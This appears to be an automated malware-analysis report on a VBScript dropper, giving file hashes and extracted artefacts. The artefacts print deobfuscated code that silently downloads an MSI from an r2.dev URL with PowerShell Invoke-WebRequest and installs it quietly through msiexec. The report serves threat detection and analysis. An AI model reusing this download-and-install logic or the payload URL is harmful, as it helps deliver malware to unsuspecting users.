Malicious

c5baa116513ebc302cffc1e2ccf46ffd

VBScript | MD5: c5baa116513ebc302cffc1e2ccf46ffd | Size: 1.25 KB | text/vbscript

Characteristics
Hash | Hash Value
MD5 | c5baa116513ebc302cffc1e2ccf46ffd
Sha1 | b0a203015708ca5bb442a8224379b7348b331c11
Sha256 | 4faad793253d32d0c6c7a5d0ec7526f546c5e980599b5e635ca40153fd782643
Sha384 | 295ab9fdc44fc06c17abd5ad227b2a0befd79149e574368fb2ea22520cc1a99cf7708da02b12824ff83fe3cc0a12b25f
Sha512 | bb870387f8f01173a504b5dcb930643b3deeffe5b63628fa9fc13dbc8734b7a1c2326a39f562880d746b089a3ab1693f5511693dea893c1bb095ebfabb3c8011
SSDeep | 24:1zdzPK2hNZUlNeltZ6BI56w1AZUMaFSOF:1zlXNZUlclD6BIbAZM
TLSH | 3D219C8F6206B2549EB2521586C73D3CEA826F328E9070B45FE8854CCD21779B3AD497
File Structure
[PowerShell Command] | Malicious
[Deobfuscated PS] | Malicious
c5baa116513ebc302cffc1e2ccf46ffd.deobfuscated.vbs | Malicious
Characteristics
No malware configuration was found at this point.
Artefacts

Name: URLs in VB Code - #1
Value: https://pub-0a6599d7d6394e379b6da3d6bfb5354a.r2.dev/goodg.msi
Location: c5baa116513ebc302cffc1e2ccf46ffd

Name: Deobfuscated PowerShell
Value: "Invoke-WebRequest -Uri 'https://pub-0a6599d7d6394e379b6da3d6bfb5354a.r2.dev/goodg.msi' -OutFile '"
Malicious
Location: c5baa116513ebc302cffc1e2ccf46ffd > c5baa116513ebc302cffc1e2ccf46ffd.deobfuscated.vbs > [Command #0] > [PowerShell Command]

Name: Deobfuscated PowerShell
Value: "" Invoke-WebRequest -Uri "" & msiURL & "" -OutFile "" & msiPath & "" "" shell.Run downloadCmd, 0, True ' ==================================== ' Check if download succeeded ' ==================================== If Not fso.FileExists(msiPath) Then WScript.Quit End If ' ==================================== ' Install MSI with passive UI ' ==================================== installCmd = " "msiexec" "/i" "" & msiPath & "" "/passive" "/norestart shell.Run installCmd, 1, True"
Malicious
Location: c5baa116513ebc302cffc1e2ccf46ffd > [PowerShell Command]
